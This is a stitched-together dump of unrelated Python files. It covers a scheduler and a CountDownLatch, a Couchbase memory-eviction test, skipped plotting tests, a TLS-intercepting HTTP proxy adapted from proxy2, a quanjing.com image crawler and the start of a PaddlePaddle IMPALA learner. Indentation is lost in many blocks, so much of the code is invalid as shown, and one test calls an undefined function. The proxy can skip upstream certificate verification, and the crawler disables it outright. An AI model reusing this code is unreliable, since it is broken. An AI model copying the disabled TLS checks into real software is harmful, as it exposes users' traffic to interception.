trace("stop: entered")
with self._lock: # we don't NEED to lock, but locking anyway
self._quit = True
self._event.set() # wake up background thread if necessary
if block and self._thread:
trace("stop: waiting for thread to complete")
# This works even if the thread has exited prematurely
self._thread.join()
trace("stop:thread completed")
def healthy(self) -> bool:
""" Returns if the scheduler is stopped or running OK. If
a client event handler threw an exception it returns True."""
return not self._event_exception
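# Usage sketch (illustrative, not part of the original module): a handler that
# re-arms itself for periodic behaviour, followed by a blocking shutdown. The
# delays and tick count are arbitrary example values.
def _event_scheduler_demo():
    scheduler = EventScheduler()
    scheduler.start()
    ticks = []
    def tick():
        ticks.append(time.time())
        if len(ticks) < 3:
            try:
                scheduler.schedule(0.05, tick)  # re-arm for the next tick
            except ValueError:
                pass  # scheduler is already stopping
    scheduler.schedule(0.05, tick)
    time.sleep(0.5)
    scheduler.stop(block=True)
    return len(ticks), scheduler.healthy()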
class ConcurrentInvoker:
"""For invoking a function in a different context and logging errors.
    Invocation is suppressed if an earlier error occurred. A list of exceptions is
available in self.exceptions (up to about MAX_EXCEPTIONS)"""
# (Approximate) max exceptions to save in self.exceptions. It is
# technically approximate because of concurrent execution
MAX_EXCEPTIONS = 5
def __init__(self, executor, logger=None):
"""Initialize the invoker"""
self._executor = executor
self._logger = logger
self.exceptions = []
def invoke(self, func, *args, **kwargs) -> None:
"""Invoke {func(*args, **kwargs)} in a different execution context.
Invocation is suppressed if an earlier exception occurred. If an
exception is raised by invoking {func}, the exception may be
        added to list {self.exceptions} and future invocations will be suppressed."""
self.tagged_invoke(None, func, *args, **kwargs)
def tagged_invoke(self, tag, func, *args, **kwargs) -> None:
"""Same as invoke, with the addition that {tag} is logged to help
distinguish one invocation of {func} from another."""
prefix = str(tag)+ ', ' if tag else ''
def rootfunc():
if self.exceptions:
if self._logger:
msg = "invocation(%s%s): SUPPRESSED because of earlier exception"
self._logger.error(msg, prefix, func.__name__)
return
try:
func(*args, **kwargs)
except Exception as exp:
if len(self.exceptions) < ConcurrentInvoker.MAX_EXCEPTIONS:
self.exceptions.append(exp)
if self._logger:
self._logger.error("Invocation(%s%s) raised exception",
prefix, func.__name__, exc_info=True)
raise exp
self._executor.submit(rootfunc)
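# Usage sketch (illustrative, not part of the original module): ConcurrentInvoker
# driving a standard concurrent.futures.ThreadPoolExecutor. After the first
# invocation raises, the exception is kept in .exceptions and later invocations
# are suppressed. Names and values here are example assumptions only.
def _concurrent_invoker_demo():
    from concurrent.futures import ThreadPoolExecutor
    results = []
    with ThreadPoolExecutor(max_workers=1) as pool:
        invoker = ConcurrentInvoker(pool, logger=_logger)
        invoker.invoke(results.append, 1)
        invoker.tagged_invoke("bad", lambda: 1 / 0)   # raises and is recorded
        invoker.invoke(results.append, 2)             # suppressed by the earlier error
    return results, invoker.exceptions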
class CountDownLatch():
"""Emulation of Java's CountDownLatch.
>>> latch = CountDownLatch(2)
>>> latch.wait(0.01) # Haven't counted down to 0; should timeout.
False
>>> latch.count_down()
>>> latch.wait(0.01) # Haven't counted down to 0; should timeout.
False
>>> latch.count_down()
>>> latch.wait(0.01) # We've counted down to 0; should succeed
True
>>> latch.wait() # We've counted down to 0; should succeed
True
"""
def __init__(self, count):
"""Initializes the latch with the specified count"""
self.count = count
self.cond = threading.Condition()
def count_down(self) -> None:
"""Counts down by 1. Count MUST be greater than 1 else
a ValueError exception is thrown"""
with self.cond:
if self.count < 1:
raise ValueError("Attempt to count down below 0")
self.count -= 1
if self.count <= 0:
                self.cond.notify_all()
def wait(self, timeout=None) -> bool:
"""Waits until the count goes to zero, or until the timeout expires.
If {timeout} is None, there is no timeout.
Return value: True unless timeout expired, in which case it returns False.
        Note: timing resolution is that of time.time(), and is also subject to
        thread scheduling latencies.
"""
if timeout is None:
# simple case of infinite timeout
with self.cond:
while self.count > 0:
self.cond.wait()
return True # -------- EARLY RETURN --------
timeleft = timeout
timed_out = False
with self.cond:
# {{Inv: timeout not hit and count > 0}}
start = time.time()
while not timed_out and self.count > 0:
signalled = self.cond.wait(timeleft)
if signalled:
if self.count > 0:
# Oops - we were signaled, but the
# count is still not 0. We'll have to
# try again. Update time left
delta = time.time() - start
timeleft = timeout - delta
timed_out = timeleft <= 0
else:
# We timed out.
timed_out = True
return not timed_out
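# Usage sketch (illustrative, not part of the original module): the main thread
# blocks until two worker threads have both counted down. The sleep and timeout
# values are arbitrary example values.
def _count_down_latch_demo():
    latch = CountDownLatch(2)
    def worker():
        time.sleep(0.05)       # simulate some work
        latch.count_down()
    for _ in range(2):
        threading.Thread(target=worker, daemon=True).start()
    return latch.wait(timeout=1.0)  # True unless the workers stalled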
if __name__ == '__main__':
import doctest
doctest.testmod()
|
dgm.py
|
from threading import Thread
from BucketLib.BucketOperations import BucketHelper
from basetestcase import ClusterSetup
from cb_tools.cbstats import Cbstats
from couchbase_helper.documentgenerator import doc_generator
from remote.remote_util import RemoteMachineShellConnection
from table_view import TableView
class Bucket_DGM_Tests(ClusterSetup):
def setUp(self):
super(Bucket_DGM_Tests, self).setUp()
self.create_bucket()
self.cluster_util.print_cluster_stats()
doc_create = doc_generator(
self.key, 0, self.num_items,
key_size=self.key_size, doc_size=self.doc_size,
doc_type=self.doc_type, vbuckets=self.cluster_util.vbuckets)
for bucket in self.bucket_util.buckets:
task = self.task.async_load_gen_docs(
self.cluster, bucket, doc_create, "create", 0,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability_level,
timeout_secs=self.sdk_timeout,
batch_size=10,
process_concurrency=8)
self.task.jython_task_manager.get_task_result(task)
# Verify initial doc load count
self.bucket_util._wait_for_stats_all_buckets()
self.bucket_util.verify_stats_all_buckets(self.num_items)
self.log.info("========= Finished Bucket_DGM_Tests setup =======")
def tearDown(self):
super(Bucket_DGM_Tests, self).tearDown()
def test_dgm_to_non_dgm(self):
# Prepare DGM scenario
bucket = self.bucket_util.get_all_buckets()[0]
dgm_gen = doc_generator(
self.key, self.num_items, self.num_items+1)
dgm_task = self.task.async_load_gen_docs(
self.cluster, bucket, dgm_gen, "create", 0,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability_level,
timeout_secs=self.sdk_timeout,
batch_size=10,
process_concurrency=4,
active_resident_threshold=self.active_resident_threshold)
self.task_manager.get_task_result(dgm_task)
num_items = dgm_task.doc_index
gen_create = doc_generator(self.key, num_items,
num_items+self.num_items,
key_size=self.key_size,
doc_size=self.doc_size,
doc_type=self.doc_type,
vbuckets=self.cluster_util.vbuckets)
gen_update = doc_generator(self.key, 0, self.num_items,
key_size=self.key_size,
doc_size=self.doc_size,
doc_type=self.doc_type,
vbuckets=self.cluster_util.vbuckets)
gen_delete = doc_generator(self.key, self.num_items, num_items,
key_size=self.key_size,
doc_size=self.doc_size,
doc_type=self.doc_type,
vbuckets=self.cluster_util.vbuckets)
# Perform continuous updates while bucket moves from DGM->non-DGM state
if not self.atomicity:
tasks = list()
tasks.append(self.task.async_load_gen_docs(
self.cluster, bucket, gen_update, "update", 0,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability_level,
timeout_secs=self.sdk_timeout,
batch_size=10, process_concurrency=2))
tasks.append(self.task.async_load_gen_docs(
self.cluster, bucket, gen_delete, "delete", 0,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability_level,
batch_size=10, process_concurrency=2,
timeout_secs=self.sdk_timeout,
skip_read_on_error=True))
tasks.append(self.task.async_load_gen_docs(
self.cluster, bucket, gen_create, "create", 0,
persist_to=self.persist_to, replicate_to=self.replicate_to,
durability=self.durability_level,
timeout_secs=self.sdk_timeout,
batch_size=10, process_concurrency=2))
for task in tasks:
self.task.jython_task_manager.get_task_result(task)
else:
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets, gen_create,
"create", 0, batch_size=20,
process_concurrency=8,
replicate_to=self.replicate_to,
persist_to=self.persist_to,
timeout_secs=self.sdk_timeout,
retries=self.sdk_retries,
transaction_timeout=self.transaction_timeout,
commit=self.transaction_commit,
durability=self.durability_level,
sync=self.sync)
self.task.jython_task_manager.get_task_result(task)
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets, gen_create,
"update", 0, batch_size=20,
process_concurrency=8,
replicate_to=self.replicate_to,
persist_to=self.persist_to,
timeout_secs=self.sdk_timeout,
retries=self.sdk_retries,
transaction_timeout=self.transaction_timeout,
update_count=self.update_count,
commit=self.transaction_commit,
durability=self.durability_level,
sync=self.sync)
self.task.jython_task_manager.get_task_result(task)
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets, gen_delete,
"rebalance_delete", 0, batch_size=20,
process_concurrency=8,
replicate_to=self.replicate_to,
persist_to=self.persist_to,
timeout_secs=self.sdk_timeout,
retries=self.sdk_retries,
transaction_timeout=self.transaction_timeout,
commit=self.transaction_commit,
durability=self.durability_level,
sync=self.sync)
self.task.jython_task_manager.get_task_result(task)
def test_MB_40531(self):
"""
Test to validate,
1. Active resident ratio on the nodes never goes
down below the replica_rr value
2. 'evictable' (vb_replica_itm_mem - vb_replica_meta_data_mem) value
never goes below wm_threshold of total bucket memory (ep_max_size)
:return:
"""
def check_replica_eviction():
tbl = TableView(self.log.info)
tbl.set_headers(["Node", "Memory", "WM_Threshold",
"Itm_mem", "Meta_mem", "Evictable_mem",
"A_rr", "R_rr"])
while self.test_failure is None and run_eviction_check:
tbl.rows = []
for kv_node in node_data.keys():
all_stats = \
node_data[kv_node]["cbstat"].all_stats(bucket.name)
bucket_mem = int(all_stats["ep_max_size"])
wm_threshold = \
(float(all_stats["ep_mem_high_wat_percent"])
- float(all_stats["ep_mem_low_wat_percent"]))*100
evictable_mem = \
int(all_stats["vb_replica_itm_memory"]) \
- int(all_stats["vb_replica_meta_data_memory"])
active_rr = int(all_stats["vb_active_perc_mem_resident"])
replica_rr = int(all_stats["vb_replica_perc_mem_resident"])
tbl.add_row([kv_node.ip, str(bucket_mem),
str(wm_threshold),
all_stats["vb_replica_itm_memory"],
all_stats["vb_replica_meta_data_memory"],
str(evictable_mem),
str(active_rr), str(replica_rr)])
if active_rr != 100 \
and evictable_mem > (bucket_mem/wm_threshold):
tbl.display("Node memory stats")
self.log_failure("%s - Active keys evicted before "
"meeting the threshold: %s"
% (kv_node.ip, all_stats))
if replica_rr > active_rr:
tbl.display("Node memory stats")
self.log_failure("%s: (active_rr) %s < %s (replica_rr)"
% (kv_node.ip, active_rr, replica_rr))
bucket = self.bucket_util.buckets[0]
node_data = dict()
kv_nodes = self.cluster_util.get_kv_nodes()
for node in kv_nodes:
cbstat = Cbstats(RemoteMachineShellConnection(node))
node_data[node] = dict()
node_data[node]["cbstat"] = cbstat
node_data[node]["active"] = cbstat.vbucket_list(bucket.name,
"active")
node_data[node]["replica"] = cbstat.vbucket_list(bucket.name,
"replica")
target_dgm = 30
run_eviction_check = True
bucket_helper = BucketHelper(self.cluster.master)
eviction_check_thread = Thread(target=check_replica_eviction)
eviction_check_thread.start()
op_index = 0
op_batch_size = 8000
create_batch_size = 10000
# Perform ADD/SET/READ until targeted DGM value is reached
curr_dgm = bucket_helper.fetch_bucket_stats(bucket.name)[
"op"]["samples"]["vb_active_resident_items_ratio"][-1]
self.log.info("Wait for DGM to reach %s%%. Current DGM: %s%%"
% (target_dgm, curr_dgm))
while int(curr_dgm) > target_dgm and self.test_failure is None:
create_gen = doc_generator(
self.key, self.num_items, self.num_items+create_batch_size,
key_size=self.key_size, doc_size=self.doc_size,
mutation_type="ADD")
update_gen = doc_generator(
self.key, op_index, op_index+op_batch_size,
key_size=self.key_size, doc_size=self.doc_size,
mutation_type="ADD")
read_gen = doc_generator(
self.key, op_index, op_index+op_batch_size,
key_size=self.key_size, doc_size=0)
create_task = self.task.async_load_gen_docs(
self.cluster, bucket, create_gen, "create", 0,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability_level,
timeout_secs=self.sdk_timeout,
print_ops_rate=False,
batch_size=200,
process_concurrency=1)
update_task = self.task.async_load_gen_docs(
self.cluster, bucket, update_gen, "update", 0,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability_level,
timeout_secs=self.sdk_timeout,
print_ops_rate=False,
batch_size=200,
process_concurrency=1)
read_task = self.task.async_load_gen_docs(
self.cluster, bucket, read_gen, "read",
timeout_secs=self.sdk_timeout,
print_ops_rate=False,
batch_size=200,
process_concurrency=1)
self.task_manager.get_task_result(create_task)
self.task_manager.get_task_result(update_task)
self.task_manager.get_task_result(read_task)
# Update indexes for next iteration
op_index += op_batch_size
self.num_items += create_batch_size
curr_dgm = bucket_helper.fetch_bucket_stats(bucket.name)[
"op"]["samples"]["vb_active_resident_items_ratio"][-1]
self.log.info("Current DGM: %s%%" % curr_dgm)
# Stop eviction check thread
run_eviction_check = False
eviction_check_thread.join()
# Close shell connections
for node in kv_nodes:
node_data[node]["cbstat"].shellConn.disconnect()
self.validate_test_failure()
|
test_blitter.py
|
#%%
#%load_ext autoreload
#%autoreload 2
import multiprocessing as mp
import numpy as np
import os
import sys
import pytest
from time import sleep
from types import SimpleNamespace as SN
from utils.memory_tracker.blitter import Blitter
#%%
refresh = 3
history = 12
dataEvents = 1000
history / refresh
def reader(queues):
for val in np.random.rand(dataEvents):
queues.graph.put(val)
if round(np.random.rand()-.25) == 1:
queues.event.put('R')
sleep(refresh)
def writer(queues):
for val in np.random.rand(dataEvents):
queues.graph.put(val)
if round(np.random.rand()-.25) == 1:
queues.event.put('W')
sleep(refresh)
@pytest.mark.skip
def test_plotter():
pltt = Blitter(refresh=refresh, history=history)
print('Getting queues')
readQ = pltt.get_queues('reader')
writeQ = pltt.get_queues('writer')
print('Starting')
#plttProc = mp.Process(target=pltt.start)
readProc = mp.Process(target=reader, args=(readQ, ))
writProc = mp.Process(target=writer, args=(writeQ, ))
#plttProc.start()
readProc.start()
writProc.start()
pltt.start()
#sleep(5)
#print('Pausing')
#pltt.pause()
#sleep(10)
#print('Resuming')
#pltt.resume()
#sleep(5)
print('Joining')
readProc.join()
writProc.join()
#pltt.pause()
#input('Press any key to exit\n')
pltt.stop()
#plttProc.terminate()
print('Exiting')
@pytest.mark.skip
def test_watcher():
pltt = Blitter(refresh=refresh, history=history)
print('Getting queues')
readQ = pltt.get_queues('reader')
writQ = pltt.get_queues('writer')
totaQ = pltt.get_queues('total')
trash = SN(graph=mp.Queue(), event=mp.Queue())
readProc = mp.Process(target=reader, args=(trash, ))
writProc = mp.Process(target=writer, args=(trash, ))
print('Starting reader and writer')
readProc.start()
writProc.start()
print('Starting watcher')
procs = {
'reader': {'pid': readProc.pid, 'queue': readQ.graph},
'writer': {'pid': writProc.pid, 'queue': writQ.graph},
'total' : {'queue': totaQ.graph}
}
watcher(procs, refresh=refresh)
print('Starting Blitter')
pltt.start()
print('Joining reader and writer')
readProc.join()
writProc.join()
#pltt.pause()
#input('Press any key to exit')
pltt.stop()
print('Exiting')
@pytest.mark.skip
#@watch(name='script', plotter={'refresh': refresh, 'history': history})
def test_decorator():
    data = np.array([])
    for i in range(dataEvents):
        data = np.concatenate((data, np.random.rand(int(np.random.rand()*1e5))))
        if round(np.random.rand()-.5) == 1:
            del data
            data = np.array([])
|
proxy2.py
|
# -*- coding: utf-8 -*-
#
#
# This code originated from the project https://github.com/inaz2/proxy2 but has since
# been modified extensively.
#
#
import base64
import re
import socket
import ssl
import threading
import urllib.parse
from http.client import HTTPConnection, HTTPSConnection
from http.server import BaseHTTPRequestHandler
from . import cert, socks
class ProxyRequestHandler(BaseHTTPRequestHandler):
protocol_version = 'HTTP/1.1'
# Path to the directory used to store the generated certificates.
# Subclasses can override certdir
certdir = cert.CERTDIR
def __init__(self, *args, **kwargs):
self.tls = threading.local()
self.tls.conns = {}
self.websocket = False
super().__init__(*args, **kwargs)
def do_CONNECT(self):
self.send_response(200, 'Connection Established')
self.end_headers()
certpath = cert.generate(self.path.split(':')[0], self.certdir)
        # ssl.wrap_socket() was removed in Python 3.12; build an SSLContext instead
        context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        context.load_cert_chain(certfile=certpath, keyfile=cert.CERTKEY)
        with context.wrap_socket(self.connection, server_side=True) as conn:
self.connection = conn
self.rfile = conn.makefile('rb', self.rbufsize)
self.wfile = conn.makefile('wb', self.wbufsize)
conntype = self.headers.get('Proxy-Connection', '')
if self.protocol_version == 'HTTP/1.1' and conntype.lower() != 'close':
self.close_connection = False
else:
self.close_connection = True
def proxy_request(self):
req = self
content_length = int(req.headers.get('Content-Length', 0))
req_body = self.rfile.read(content_length) if content_length else None
if req.path[0] == '/':
path = '{}{}'.format(req.headers['Host'], req.path)
if isinstance(self.connection, ssl.SSLSocket):
req.path = 'https://{}'.format(path)
else:
req.path = 'http://{}'.format(path)
req_body_modified = self.handle_request(req, req_body)
if req_body_modified is False:
# Response already committed
return
elif req_body_modified is not None:
req_body = req_body_modified
del req.headers['Content-length']
req.headers['Content-length'] = str(len(req_body))
u = urllib.parse.urlsplit(req.path)
scheme, netloc, path = u.scheme, u.netloc, (u.path + '?' + u.query if u.query else u.path)
assert scheme in ('http', 'https', 'about')
if netloc:
req.headers['Host'] = netloc
setattr(req, 'headers', self._filter_headers(req.headers))
try:
conn = self._create_connection((scheme, netloc))
conn.request(self.command, path, req_body, dict(req.headers))
res = conn.getresponse()
if res.headers.get('Upgrade') == 'websocket':
self.websocket = True
version_table = {10: 'HTTP/1.0', 11: 'HTTP/1.1'}
setattr(res, 'headers', res.msg)
setattr(res, 'response_version', version_table[res.version])
res_body = res.read()
except Exception:
msg = 'Error making request to: %s'
if self.server.options.get('suppress_connection_errors', True):
self.log_message(msg, req.path)
else:
self.log_error(msg, req.path)
self.close_connection = True
return
res_body_modified = self.handle_response(req, req_body, res, res_body)
if res_body_modified is False:
self.send_error(403)
return
elif res_body_modified is not None:
res_body = res_body_modified
del res.headers['Content-length']
res.headers['Content-Length'] = str(len(res_body))
setattr(res, 'headers', self._filter_headers(res.headers))
self.commit_response(
res.status,
res.reason,
res.headers,
res_body,
conn
)
def _create_connection(self, origin):
scheme, netloc = origin
if origin not in self.tls.conns:
proxy_config = self.server.proxy_config
kwargs = {
'timeout': self.timeout
}
if scheme == 'https':
connection = ProxyAwareHTTPSConnection
if not self.server.options.get('verify_ssl', False):
kwargs['context'] = ssl._create_unverified_context()
else:
connection = ProxyAwareHTTPConnection
self.tls.conns[origin] = connection(proxy_config, netloc, **kwargs)
return self.tls.conns[origin]
do_HEAD = proxy_request
do_POST = proxy_request
do_GET = proxy_request
do_PUT = proxy_request
do_DELETE = proxy_request
do_OPTIONS = proxy_request
do_PATCH = proxy_request
def _filter_headers(self, headers):
# http://tools.ietf.org/html/rfc2616#section-13.5.1
hop_by_hop = (
'keep-alive',
'proxy-authenticate',
'proxy-authorization',
'proxy-connection',
'te',
'trailers',
'transfer-encoding',
)
for k in hop_by_hop:
del headers[k]
# Remove the `connection` header for non-websocket requests
if 'connection' in headers:
if 'upgrade' not in headers['connection'].lower():
del headers['connection']
# Accept only supported encodings
if 'Accept-Encoding' in headers:
ae = headers['Accept-Encoding']
if self.server.options.get('disable_encoding') is True:
permitted_encodings = ('identity', )
else:
permitted_encodings = ('identity', 'gzip', 'x-gzip', 'deflate')
filtered_encodings = [x for x in re.split(r',\s*', ae) if x in permitted_encodings]
if not filtered_encodings:
filtered_encodings.append('identity')
del headers['Accept-Encoding']
headers['Accept-Encoding'] = ', '.join(filtered_encodings)
return headers
def _keepalive(self):
return self.server.options.get('connection_keep_alive', False) \
and self.headers.get('Connection', '').lower() != 'close'
def _handle_websocket(self, server_sock):
self.connection.settimeout(None)
server_sock.settimeout(None)
def server_read():
try:
while True:
serverdata = server_sock.recv(4096)
if not serverdata:
break
self.connection.sendall(serverdata)
except socket.error:
self.log_message('Ending websocket server connection')
finally:
if server_sock:
server_sock.close()
if self.connection:
self.connection.close()
t = threading.Thread(target=server_read, daemon=True)
t.start()
try:
while True:
clientdata = self.connection.recv(4096)
if not clientdata:
break
server_sock.sendall(clientdata)
except socket.error:
self.log_message('Ending websocket client connection')
finally:
if server_sock:
server_sock.close()
if self.connection:
self.connection.close()
t.join()
def handle_one_request(self):
if not self.websocket:
super().handle_one_request()
def finish(self):
for conn in self.tls.conns.values():
if conn:
conn.close()
super().finish()
def handle_request(self, req, req_body):
"""Hook method that subclasses should override to process a request.
If the request body has been modified, it should be returned from the method.
Returning False will indicate that the response has been committed and no
further processing will take place.
Args:
req: A ProxyRequestHandler instance.
req_body: The request body as bytes.
"""
pass
def handle_response(self, req, req_body, res, res_body):
"""Hook method that subclasses should override to process a response.
If the response body has been modified, it should be returned from the method.
Args:
req: The original request - a ProxyRequestHandler instance.
req_body: The request body as bytes.
res: The response (a http.client.HTTPResponse instance) that corresponds to the
request.
res_body: The response body as bytes.
"""
pass
def commit_response(self, status, reason, headers, body, conn=None):
self.send_response(status, reason)
for header, val in headers.items():
self.send_header(header, val)
self.end_headers()
if body:
self.wfile.write(body)
self.wfile.flush()
if self.websocket and conn is not None:
self._handle_websocket(conn.sock)
self.close_connection = True
elif not self._keepalive():
self.close_connection = True
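# Usage sketch (illustrative, not part of the original module): a minimal
# subclass wiring up the handle_request/handle_response hooks documented above.
# The header name and the blocked host are example assumptions only.
class _ExampleInterceptingHandler(ProxyRequestHandler):
    def handle_request(self, req, req_body):
        # Tag outgoing requests; returning None leaves the body unchanged.
        req.headers['X-Example-Proxy'] = '1'
        return None
    def handle_response(self, req, req_body, res, res_body):
        # Returning False makes proxy_request() answer with a 403;
        # returning None forwards the response body untouched.
        if 'blocked.example.com' in req.path:
            return False
        return None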
class ProxyAwareHTTPConnection(HTTPConnection):
"""A specialised HTTPConnection that will transparently connect to a
HTTP or SOCKS proxy server based on supplied proxy configuration.
"""
def __init__(self, proxy_config, netloc, *args, **kwargs):
self.proxy_config = proxy_config
self.netloc = netloc
self.use_proxy = 'http' in proxy_config and netloc not in proxy_config.get('no_proxy', '')
if self.use_proxy and proxy_config['http'].scheme.startswith('http'):
self.custom_authorization = proxy_config.get('custom_authorization')
super().__init__(proxy_config['http'].hostport, *args, **kwargs)
else:
super().__init__(netloc, *args, **kwargs)
def connect(self):
if self.use_proxy and self.proxy_config['http'].scheme.startswith('socks'):
self.sock = _socks_connection(
self.host,
self.port,
self.timeout,
self.proxy_config['http']
)
else:
super().connect()
def request(self, method, url, body=None, headers=None, *, encode_chunked=False):
if headers is None:
headers = {}
if self.use_proxy and self.proxy_config['http'].scheme.startswith('http'):
if not url.startswith('http'):
url = 'http://{}{}'.format(self.netloc, url)
headers.update(_create_auth_header(
self.proxy_config['http'].username,
self.proxy_config['http'].password,
self.custom_authorization)
)
super().request(method, url, body, headers=headers)
class ProxyAwareHTTPSConnection(HTTPSConnection):
"""A specialised HTTPSConnection that will transparently connect to a
HTTP or SOCKS proxy server based on supplied proxy configuration.
"""
def __init__(self, proxy_config, netloc, *args, **kwargs):
self.proxy_config = proxy_config
self.use_proxy = 'https' in proxy_config and netloc not in proxy_config.get('no_proxy', '')
if self.use_proxy and proxy_config['https'].scheme.startswith('http'):
# For HTTP proxies, CONNECT tunnelling is used
super().__init__(proxy_config['https'].hostport, *args, **kwargs)
self.set_tunnel(
netloc,
headers=_create_auth_header(
proxy_config['https'].username,
proxy_config['https'].password,
proxy_config.get('custom_authorization')
)
)
else:
super().__init__(netloc, *args, **kwargs)
def connect(self):
if self.use_proxy and self.proxy_config['https'].scheme.startswith('socks'):
self.sock = _socks_connection(
self.host,
self.port,
self.timeout,
self.proxy_config['https']
)
self.sock = self._context.wrap_socket(self.sock, server_hostname=self.host)
else:
super().connect()
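# Usage sketch (illustrative, not part of the original module): the connection
# classes above only read .scheme, .hostport, .username and .password from each
# proxy_config entry, so a namedtuple is used here as a stand-in for whatever
# object the surrounding project actually supplies.
def _proxy_connection_demo():
    from collections import namedtuple
    ProxyEntry = namedtuple('ProxyEntry', 'scheme hostport username password')
    proxy_config = {
        'https': ProxyEntry('http', 'proxy.example.com:3128', None, None),
        'no_proxy': 'localhost,127.0.0.1',
    }
    conn = ProxyAwareHTTPSConnection(proxy_config, 'example.com', timeout=10)
    conn.request('GET', '/')  # tunnelled through the proxy with CONNECT
    return conn.getresponse().status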
def _create_auth_header(proxy_username, proxy_password, custom_proxy_authorization):
"""Create the Proxy-Authorization header based on the supplied username
and password or custom Proxy-Authorization header value.
Args:
proxy_username: The proxy username.
proxy_password: The proxy password.
custom_proxy_authorization: The custom proxy authorization.
Returns:
A dictionary containing the Proxy-Authorization header or an empty
dictionary if the username or password were not set.
"""
headers = {}
if proxy_username and proxy_password and not custom_proxy_authorization:
proxy_username = urllib.parse.unquote(proxy_username)
proxy_password = urllib.parse.unquote(proxy_password)
auth = '{}:{}'.format(proxy_username, proxy_password)
headers['Proxy-Authorization'] = 'Basic {}'.format(base64.b64encode(auth.encode('utf-8')).decode('utf-8'))
elif custom_proxy_authorization:
headers['Proxy-Authorization'] = custom_proxy_authorization
return headers
def _socks_connection(host, port, timeout, socks_config):
"""Create a SOCKS connection based on the supplied configuration."""
try:
socks_type = dict(
socks4=socks.PROXY_TYPE_SOCKS4,
socks5=socks.PROXY_TYPE_SOCKS5,
socks5h=socks.PROXY_TYPE_SOCKS5
)[socks_config.scheme]
except KeyError:
raise TypeError('Invalid SOCKS scheme: {}'.format(socks_config.scheme))
socks_host, socks_port = socks_config.hostport.split(':')
return socks.create_connection(
(host, port),
timeout,
None,
socks_type,
socks_host,
int(socks_port),
socks_config.scheme == 'socks5h',
socks_config.username,
socks_config.password,
((socket.IPPROTO_TCP, socket.TCP_NODELAY, 1),)
)
|
quanjingwang.py
|
# -*- coding:utf-8 -*-
# Multi-threaded crawler: folders are created automatically, one folder per page of images
import os
import queue
import re
import threading
import time
import requests
from bs4 import BeautifulSoup
string = 'https://www.quanjing.com/category/1286521/'
url_queue = queue.Queue()
pipei = re.compile('lowsrc="(.*?)" m=')  # regex that captures the image URLs
def get_url(page):
for i in range(1, page + 1):
        url = string + '{}.html'.format(i)  # build the page URL from the page number
url_queue.put(url)
# print(url_queue.queue)
def spider(url_queue):
    try:
        url = url_queue.get_nowait()
    except queue.Empty:
        return  # queue already drained (more worker threads than pages)
floder_count = url[-7:-5]
if floder_count[0] == '/':
floder_name = floder_count[1]
else:
floder_name = floder_count
    os.mkdir('第{0}页'.format(floder_name))  # mkdir creates a single level only; makedirs can create nested directories split on '/'
html = requests.get(url=url, verify=False).text
soup = BeautifulSoup(html, 'lxml')
ul = soup.find_all(attrs={"class": "gallery_list"})
# print(ul)
    lianjies = re.findall(pipei, str(ul))  # re.findall needs a string, not a BeautifulSoup result set
i = 1
for lianjie in lianjies:
# print(lianjie)
result = requests.get(url=lianjie, verify=False).content
        with open('第{0}页/{1}.jpg'.format(floder_name, i), 'ab') as f:
f.write(result)
print('第{0}页第{1}张存储完成'.format(floder_name, i))
i += 1
if not url_queue.empty():
spider(url_queue)
def main():
queue_list = []
queue_count = 3
for i in range(queue_count):
t = threading.Thread(target=spider, args=(url_queue,))
queue_list.append(t)
for t in queue_list:
t.start()
for t in queue_list:
t.join()
if __name__ == '__main__':
page = int(input("请输入需要爬取的页数:"))
get_url(page)
start_time = time.time()
main()
print("test3用时:%f" % (time.time() - start_time))
|
train.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import gym
import numpy as np
import os
import queue
import time
import threading
import parl
from atari_model import AtariModel
from atari_agent import AtariAgent
from parl.env.atari_wrappers import wrap_deepmind
from parl.utils import logger, tensorboard, get_gpu_count
from parl.utils.scheduler import PiecewiseScheduler
from parl.utils.time_stat import TimeStat
from parl.utils.window_stat import WindowStat
from parl.utils import machine_info
from actor import Actor
class Learner(object):
def __init__(self, config):
self.config = config
self.sample_data_queue = queue.Queue(
maxsize=config['sample_queue_max_size'])
#=========== Create Agent ==========
env = gym.make(config['env_name'])
env = wrap_deepmind(env, dim=config['env_dim'], obs_format='NCHW')
obs_shape = env.observation_space.shape
act_dim = env.action_space.n
model = AtariModel(act_dim)
algorithm = parl.algorithms.IMPALA(
model,
sample_batch_steps=self.config['sample_batch_steps'],
gamma=self.config['gamma'],
vf_loss_coeff=self.config['vf_loss_coeff'],
clip_rho_threshold=self.config['clip_rho_threshold'],
clip_pg_rho_threshold=self.config['clip_pg_rho_threshold'])
self.agent = AtariAgent(algorithm, obs_shape, act_dim,
self.learn_data_provider)
if machine_info.is_gpu_available():
assert get_gpu_count() == 1, 'Only support training in single GPU,\
Please set environment variable: `export CUDA_VISIBLE_DEVICES=[GPU_ID_TO_USE]` .'
self.cache_params = self.agent.get_weights()
self.params_lock = threading.Lock()
self.params_updated = False
self.cache_params_sent_cnt = 0
self.total_params_sync = 0
#========== Learner ==========
self.lr, self.entropy_coeff = None, None
self.lr_scheduler = PiecewiseScheduler(config['lr_scheduler'])
self.entropy_coeff_scheduler = PiecewiseScheduler(
config['entropy_coeff_scheduler'])
self.total_loss_stat = WindowStat(100)
self.pi_loss_stat = WindowStat(100)
self.vf_loss_stat = WindowStat(100)
self.entropy_stat = WindowStat(100)
self.kl_stat = WindowStat(100)
self.learn_time_stat = TimeStat(100)
self.start_time = None
self.learn_thread = threading.Thread(target=self.run_learn)
        self.learn_thread.daemon = True
self.learn_thread.start()
#========== Remote Actor ===========
self.remote_count = 0
self.batch_buffer = []
self.remote_metrics_queue = queue.Queue()
